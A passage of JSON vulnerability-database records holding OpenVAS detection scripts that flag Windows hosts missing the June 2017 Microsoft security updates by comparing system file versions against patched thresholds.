exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:19:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8488", "CVE-2017-8531", "CVE-2017-8481", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8482", "CVE-2017-8528", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8472", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8553", "CVE-2017-8522", "CVE-2017-8469", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-0291", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8489", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-0193", "CVE-2017-0300", 
"CVE-2017-8519", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-0284", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8476", "CVE-2017-8529", "CVE-2017-0289", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8527", "CVE-2017-0296"], "description": "This host is missing a critical security\n update according to Microsoft KB4022724", "modified": "2020-06-04T00:00:00", "published": "2017-06-14T00:00:00", "id": "OPENVAS:1361412562310811171", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811171", "type": "openvas", "title": "Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4022724)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4022724)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811171\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0193\", \"CVE-2017-8472\", \"CVE-2017-8473\", \"CVE-2017-8474\",\n \"CVE-2017-8527\", \"CVE-2017-8528\", \"CVE-2017-0282\", \"CVE-2017-8475\",\n \"CVE-2017-8476\", \"CVE-2017-8529\", \"CVE-2017-8531\", \"CVE-2017-0283\",\n \"CVE-2017-0284\", \"CVE-2017-8477\", \"CVE-2017-8478\", \"CVE-2017-8479\",\n \"CVE-2017-8532\", \"CVE-2017-8533\", \"CVE-2017-0285\", \"CVE-2017-8480\",\n \"CVE-2017-8481\", \"CVE-2017-8543\", \"CVE-2017-0287\", \"CVE-2017-0288\",\n \"CVE-2017-8482\", \"CVE-2017-8483\", \"CVE-2017-8544\", \"CVE-2017-8547\",\n \"CVE-2017-0289\", \"CVE-2017-0291\", \"CVE-2017-0292\", \"CVE-2017-8484\",\n \"CVE-2017-8485\", \"CVE-2017-8553\", \"CVE-2017-0294\", \"CVE-2017-0296\",\n \"CVE-2017-8488\", \"CVE-2017-8489\", \"CVE-2017-0297\", \"CVE-2017-0298\",\n \"CVE-2017-8490\", \"CVE-2017-8491\", \"CVE-2017-8492\", \"CVE-2017-0299\",\n \"CVE-2017-0300\", \"CVE-2017-8460\", \"CVE-2017-8462\", \"CVE-2017-8464\",\n \"CVE-2017-8470\", \"CVE-2017-8471\", \"CVE-2017-8519\", \"CVE-2017-8522\",\n \"CVE-2017-8469\", \"CVE-2017-8517\", \"CVE-2017-8554\");\n script_bugtraq_id(98878, 98851, 98852, 98902, 98933, 98949, 98885, 98853, 98903,\n 98953, 98819, 98920, 98918, 98854, 98845, 98856, 98820, 98821,\n 98914, 98857, 98862, 98824, 98922, 98923, 98858, 98859, 98826,\n 98932, 98929, 98835, 98836, 98847, 98860, 98940, 98837, 98839,\n 98864, 98865, 98840, 98867, 98869, 98870, 98884, 98901, 98887,\n 98900, 98818, 98848, 98849, 98899, 98926, 98842, 98895);\n script_tag(name:\"cvss_base\", 
value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-06-14 15:20:54 +0530 (Wed, 14 Jun 2017)\");\n script_name(\"Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4022724)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4022724\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - After installing KB3164035, users cannot print enhanced\n metafiles (EMF) or documents containing bitmaps rendered out of bounds using the\n BitMapSection(DIBSection) function.\n\n - Updates were not correctly installing all components and would prevent them from\n booting.\n\n - An unsupported hardware notification is shown and Windows Updates not scanning,\n for systems using the AMD Carrizo DDR4 processor.\n\n - Security updates to Windows kernel, Microsoft Graphics Component, Microsoft\n Uniscribe, Windows kernel-mode drivers, the Windows OS, Windows COM, Internet\n Explorer and Windows Shell.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to gain the same user rights as the current user. If the current user is logged\n on with administrative user rights, an attacker who successfully exploited the\n vulnerability could take control of an affected system. An attacker could then install\n programs. View, change, or delete data, or create new accounts with full user rights.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows Server 2012.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4022724\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2012:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"win32k.sys\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.2.9200.22168\"))\n{\n report = 'File checked: ' + sysPath + \"\\win32k.sys\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: Less than 6.2.9200.22168\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:46:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8488", "CVE-2017-8531", "CVE-2017-8481", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8482", "CVE-2017-8528", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8553", "CVE-2017-8469", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-0291", "CVE-2017-8465", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8468", "CVE-2017-8489", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-0193", "CVE-2017-0300", "CVE-2017-0287", "CVE-2017-8473", 
"CVE-2017-0285", "CVE-2017-8470", "CVE-2017-0284", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8466", "CVE-2017-8476", "CVE-2017-0289", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8493", "CVE-2017-8527", "CVE-2017-0296"], "description": "This host is missing a critical security\n update according to Microsoft KB4022717", "modified": "2019-12-20T00:00:00", "published": "2017-06-14T00:00:00", "id": "OPENVAS:1361412562310811165", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811165", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4022717)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4022717)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811165\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2017-0193\", \"CVE-2017-8473\", \"CVE-2017-8474\", \"CVE-2017-8475\",\n \"CVE-2017-8527\", \"CVE-2017-8528\", \"CVE-2017-0282\", \"CVE-2017-8476\",\n \"CVE-2017-8477\", \"CVE-2017-8531\", \"CVE-2017-0283\", \"CVE-2017-0284\",\n \"CVE-2017-8478\", \"CVE-2017-8479\", \"CVE-2017-8532\", \"CVE-2017-8533\",\n \"CVE-2017-0285\", \"CVE-2017-0287\", \"CVE-2017-8480\", \"CVE-2017-8481\",\n \"CVE-2017-8543\", \"CVE-2017-0288\", \"CVE-2017-0289\", \"CVE-2017-8482\",\n \"CVE-2017-8483\", \"CVE-2017-8544\", \"CVE-2017-0291\", \"CVE-2017-0292\",\n \"CVE-2017-8484\", \"CVE-2017-8485\", \"CVE-2017-8553\", \"CVE-2017-0294\",\n \"CVE-2017-0296\", \"CVE-2017-8488\", \"CVE-2017-8489\", \"CVE-2017-8490\",\n \"CVE-2017-0297\", \"CVE-2017-0298\", \"CVE-2017-0299\", \"CVE-2017-8491\",\n \"CVE-2017-8492\", \"CVE-2017-0300\", \"CVE-2017-8460\", \"CVE-2017-8493\",\n \"CVE-2017-8462\", \"CVE-2017-8464\", \"CVE-2017-8469\", \"CVE-2017-8470\",\n \"CVE-2017-8471\", \"CVE-2017-8465\", \"CVE-2017-8466\", \"CVE-2017-8468\",\n \"CVE-2017-8554\");\n script_bugtraq_id(98878, 98852, 98902, 98853, 98933, 98949, 98885, 98903, 98854,\n 98819, 98920, 98918, 98845, 98856, 98820, 98821, 98914, 98922,\n 98857, 98862, 98824, 98923, 98929, 98858, 98859, 98826, 98835,\n 98836, 98847, 98860, 98940, 98837, 98839, 98864, 98865, 98867,\n 98840, 98884, 98869, 98870, 98901, 98887, 98850, 98900, 98818,\n 98842, 98848, 98849, 98843, 98844, 98846);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", 
value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-06-14 10:42:25 +0530 (Wed, 14 Jun 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4022717)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4022717\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This security update includes quality\n improvements.\n\n - Addressed issue where, after installing KB3170455 (MS16-087), users have\n difficulty importing printer drivers and get errors with error code 0x80070bcb.\n\n - Addressed a rare issue where mouse input can cease to function. The mouse\n pointer may continue to move, but movements and clicks produce no response other\n than a beeping noise.\n\n - Addressed issue where printing a document using a 32-bit application can crash a\n Print Server in a call to nt!MiGetVadWakeList.\n\n - Addressed issue where an unsupported hardware notification is shown and Windows\n Updates not scanning, for systems using the AMD Carrizo DDR4 processor or\n Windows Server 2012 R2 systems using Xeon E3V6 processor.\n\n - Security updates to Microsoft Windows PDF, Windows shell, Windows Kernel,\n Microsoft Graphics Component, Microsoft Uniscribe, Microsoft Scripting Engine,\n Windows COM, and Windows Kernel-Mode Drivers. For more information about the\n security vulnerabilities resolved, please refer to the Security Update Guide.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n attackers to gain the same user rights as the current user. If the current user is\n logged on with administrative user rights, an attacker who successfully exploited the\n vulnerability could take control of an affected system. 
An attacker could then install\n programs. View, change, or delete data, or create new accounts with full user rights.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 8.1 for 32-bit/x64\n\n - Microsoft Windows Server 2012 R2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4022717\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"Win32k.sys\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.3.9600.18698\"))\n{\n report = 'File checked: ' + sysPath + \"\\Win32k.sys\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: Less than 6.3.9600.18698\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:28:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8488", "CVE-2017-8531", "CVE-2017-8481", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8482", "CVE-2017-8528", "CVE-2017-0286", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8472", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8553", 
"CVE-2017-8469", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-0294", "CVE-2017-8489", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-8524", "CVE-2017-0193", "CVE-2017-0300", "CVE-2017-8519", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-0284", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8476", "CVE-2017-8529", "CVE-2017-0289", "CVE-2017-8534", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8527", "CVE-2017-0296", "CVE-2017-0260"], "description": "This host is missing a critical security\n update according to Microsoft KB4022719", "modified": "2020-06-04T00:00:00", "published": "2017-06-14T00:00:00", "id": "OPENVAS:1361412562310811173", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811173", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4022719)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4022719)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811173\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0193\", \"CVE-2017-8472\", \"CVE-2017-8473\", \"CVE-2017-8475\",\n \"CVE-2017-8527\", \"CVE-2017-8528\", \"CVE-2017-0260\", \"CVE-2017-0282\",\n \"CVE-2017-8476\", \"CVE-2017-8477\", \"CVE-2017-8529\", \"CVE-2017-8531\",\n \"CVE-2017-0283\", \"CVE-2017-0284\", \"CVE-2017-8478\", \"CVE-2017-8479\",\n \"CVE-2017-8532\", \"CVE-2017-8533\", \"CVE-2017-0285\", \"CVE-2017-0286\",\n \"CVE-2017-0287\", \"CVE-2017-8480\", \"CVE-2017-8481\", \"CVE-2017-8534\",\n \"CVE-2017-8543\", \"CVE-2017-8544\", \"CVE-2017-0288\", \"CVE-2017-0289\",\n \"CVE-2017-8482\", \"CVE-2017-8483\", \"CVE-2017-8547\", \"CVE-2017-8484\",\n \"CVE-2017-8485\", \"CVE-2017-8553\", \"CVE-2017-0294\", \"CVE-2017-0296\",\n \"CVE-2017-8488\", \"CVE-2017-8489\", \"CVE-2017-8490\", \"CVE-2017-0297\",\n \"CVE-2017-0298\", \"CVE-2017-0299\", \"CVE-2017-8491\", \"CVE-2017-8492\",\n \"CVE-2017-0300\", \"CVE-2017-8462\", \"CVE-2017-8464\", \"CVE-2017-8469\",\n \"CVE-2017-8470\", \"CVE-2017-8471\", \"CVE-2017-8524\", \"CVE-2017-8519\",\n \"CVE-2017-8554\");\n script_bugtraq_id(98878, 98851, 98852, 98853, 98933, 98949, 98810, 98885, 98903,\n 98854, 98953, 98819, 98920, 98918, 98845, 98856, 98820, 98821,\n 98914, 98891, 98922, 98857, 98862, 98822, 98824, 98826, 98923,\n 98929, 98858, 98859, 98932, 98847, 98860, 98940, 98837, 98839,\n 98864, 98865, 98867, 98840, 98884, 98869, 98870, 98901, 98900,\n 98818, 98842, 98848, 98849, 98930, 98899);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", 
value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-06-14 16:22:36 +0530 (Wed, 14 Jun 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4022719)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4022719\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws are due to,\n\n - The metafiles (EMF) or documents containing bitmaps rendered out of bounds\n using the BitMapSection(DIBSection) function.\n\n - An issue with updates are not correctly installing all components and\n would prevent them from booting.\n\n - An unsupported hardware notification is shown and Windows Updates not\n scanning, for systems using the AMD Carrizo DDR4 processor.\n\n - An error in Windows kernel, Microsoft Graphics Component, Microsoft\n Uniscribe, Windows kernel-mode drivers, the Windows OS, Windows COM,\n Internet Explorer and Windows Shell.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to gain the same user rights as the current user and take control of an affected\n system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows Server 2008 R2 for x64-based Systems Service Pack 1\n\n - Microsoft Windows 7 for 32-bit/x64 Systems Service Pack 1\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4022719\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008r2:2, win7:2, win7x64:2) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"Searchindexer.exe\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"7.0.7601.23834\"))\n{\n report = 'File checked: ' + sysPath + \"\\Searchindexer.exe\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: Less than 7.0.7601.23834\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:42:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8488", "CVE-2017-8531", "CVE-2017-8481", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8482", "CVE-2017-8528", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8553", "CVE-2017-8522", "CVE-2017-8469", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-0291", "CVE-2017-8465", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8468", "CVE-2017-8489", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", 
"CVE-2017-8524", "CVE-2017-0193", "CVE-2017-0300", "CVE-2017-8519", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-0284", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8466", "CVE-2017-8476", "CVE-2017-8529", "CVE-2017-0289", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8493", "CVE-2017-8527", "CVE-2017-0296"], "description": "This host is missing a critical security\n update according to Microsoft KB4022726", "modified": "2019-12-20T00:00:00", "published": "2017-06-14T00:00:00", "id": "OPENVAS:1361412562310811154", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811154", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4022726)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4022726)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811154\");\n script_version(\"2019-12-20T12:42:55+0000\");\n script_cve_id(\"CVE-2017-0193\", \"CVE-2017-8473\", \"CVE-2017-8474\", \"CVE-2017-8475\",\n \"CVE-2017-8527\", \"CVE-2017-8528\", \"CVE-2017-0282\", \"CVE-2017-8476\",\n \"CVE-2017-8477\", \"CVE-2017-8529\", \"CVE-2017-8531\", \"CVE-2017-0283\",\n \"CVE-2017-0284\", \"CVE-2017-8478\", \"CVE-2017-8479\", \"CVE-2017-8532\",\n \"CVE-2017-8533\", \"CVE-2017-0285\", \"CVE-2017-0287\", \"CVE-2017-8480\",\n \"CVE-2017-8481\", \"CVE-2017-8543\", \"CVE-2017-0288\", \"CVE-2017-0289\",\n \"CVE-2017-8482\", \"CVE-2017-8483\", \"CVE-2017-8544\", \"CVE-2017-8547\",\n \"CVE-2017-0291\", \"CVE-2017-0292\", \"CVE-2017-8484\", \"CVE-2017-8485\",\n \"CVE-2017-8553\", \"CVE-2017-0294\", \"CVE-2017-0296\", \"CVE-2017-8488\",\n \"CVE-2017-8489\", \"CVE-2017-8490\", \"CVE-2017-0297\", \"CVE-2017-0298\",\n \"CVE-2017-0299\", \"CVE-2017-8491\", \"CVE-2017-8492\", \"CVE-2017-0300\",\n \"CVE-2017-8460\", \"CVE-2017-8493\", \"CVE-2017-8462\", \"CVE-2017-8464\",\n \"CVE-2017-8469\", \"CVE-2017-8470\", \"CVE-2017-8471\", \"CVE-2017-8519\",\n \"CVE-2017-8522\", \"CVE-2017-8524\", \"CVE-2017-8465\", \"CVE-2017-8466\",\n \"CVE-2017-8468\", \"CVE-2017-8517\", \"CVE-2017-8554\");\n script_bugtraq_id(98878, 98852, 98902, 98853, 98933, 98949, 98885, 98903, 98854,\n 98953, 98819, 98920, 98918, 98845, 98856, 98820, 98821, 98914,\n 98922, 98857, 98862, 98824, 98923, 98929, 98858, 98859, 98826,\n 98932, 98835, 98836, 98847, 98860, 98940, 98837, 98839, 98864,\n 98865, 98867, 98840, 98884, 98869, 98870, 98901, 98887, 98850,\n 98900, 98818, 98842, 
98848, 98849, 98899, 98926, 98930, 98843,\n 98844, 98846, 98895);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 12:42:55 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-06-14 12:08:00 +0530 (Wed, 14 Jun 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4022726)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4022726\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - An error in importing printer drivers and get errors with error code\n 0x80070bcb.\n\n - The mouse input can cease to function. The mouse pointer may continue\n to move, but movements and clicks produce no response other than a\n beeping noise.\n\n - An error in printing a document using a 32-bit application can crash a\n Print Server in a call to nt!MiGetVadWakeList.\n\n - An error in unsupported hardware notification is shown and Windows\n Updates not scanning, for systems using the AMD Carrizo DDR4 processor or\n Windows Server 2012 R2 systems using Xeon E3V6 processor.\n\n - Multiple issues in Microsoft Windows PDF, Windows shell, Windows Kernel,\n Microsoft Graphics Component, Microsoft Uniscribe, Microsoft Scripting Engine,\n Windows COM, and Windows Kernel-Mode Drivers. 
For more information about the\n security vulnerabilities resolved, please refer to the Security Update Guide.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to gain\n the same user rights as the current user and to take control of an affected system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 8.1 for 32-bit/x64\n\n - Microsoft Windows Server 2012 R2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4022726\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n 